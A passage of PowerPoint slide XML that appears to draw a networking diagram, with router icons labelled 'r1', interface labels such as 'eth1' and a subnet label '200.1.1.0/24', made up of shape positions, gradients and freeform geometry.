        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4135015" y="5183863"/>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B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text Box 153">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3131147-7C6D-5AD3-4679-F3EAA061DB58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3008088" y="4654593"/>
            <a:ext cx="114646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200.1.1.0/24</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Line 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19736D24-5AAE-C331-1CC4-9C01C6FC5DEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3712201" y="4908509"/>
            <a:ext cx="442355" cy="397361"/>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61" name="Straight Connector 327">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78B745AA-BC95-3A02-9A36-2846CC169CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5152303" y="2469897"/>
            <a:ext cx="49830" cy="28359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227">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F945B2E-D07B-1E71-FE70-6B2B91C5CE2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4911658" y="2892462"/>
            <a:ext cx="441381" cy="243680"/>
            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9216" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45B921E0-5810-C5FA-4384-28AC60D794F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9218" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1431CA95-A2C0-6C6E-369F-3A86CA8B1685}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819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t-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9219" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B43E57-333D-66DC-17F9-DDA16B1DBEC9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9221" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C061C8-26D5-39A7-B7FB-229627AB4E4C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
                    <a:gd name="T15" fmla="*/ 97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5">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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22" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC5DFB54-0A55-43B3-3A84-75F517C4EA0D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 1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32">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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36" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E12E139-9DFC-F9A7-FB8F-6517602BF38D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28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2" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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38" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{485F52AA-5364-E21B-610B-95A4BEDF745B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 1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4">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393"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grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9217" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B11E2B7D-1678-5919-2768-53227B14CBE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2885" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9251" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF6AF4FB-A030-722E-D490-0A613F2E1D9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5002404" y="2547001"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9252" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC6B377E-C4BF-B26B-C40E-72684A147DF6}"/>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53" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DDFB2B6-D6EA-7A63-FB1A-081842BEB522}"/>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3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9254" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E67FE48-CDB2-711B-F869-F637D6D009E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4989256" y="3258486"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9255" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB66BB1-AD01-C363-6CCC-BC449B09F9AA}"/>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eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9256" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7489B2F5-05E8-495D-5244-6CBD9AB92AA3}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9257" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96A04B56-B034-E392-FFC7-4DC428FF5612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5008167" y="4928067"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9258" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{112E5874-2985-E51E-856F-024B64C04C16}"/>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59" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{658E5958-FAAF-2075-8C62-D2875818D88F}"/>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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9260" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96674563-F241-194F-925C-4C9E8B01AC87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5013037" y="4230593"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9261" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FB7A3B4-CA8D-6008-2F75-2C2084D1D88F}"/>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eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9262" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF63E3E9-CB4F-02C5-729E-898B13BD6CBB}"/>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2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9263" name="Group 227">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D17ABDAF-7568-1224-44C5-0069065F5C39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4962850" y="4602893"/>
            <a:ext cx="441381" cy="243680"/>
            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9264" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C47499A-D17A-16BC-5B4C-B34DEEED46B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9266" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{579439D8-FEFE-A7EF-D093-54AD57DDF201}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819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t-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9267" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70B551E3-90F6-9EC7-3021-E5C6E2B55E54}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9268" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8563FD8-30A5-A16C-B4ED-92A1B7CC99E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
                    <a:gd name="T15" fmla="*/ 97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5">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0"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69" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{429359C7-4A59-69DC-4857-2CC0169C11A3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
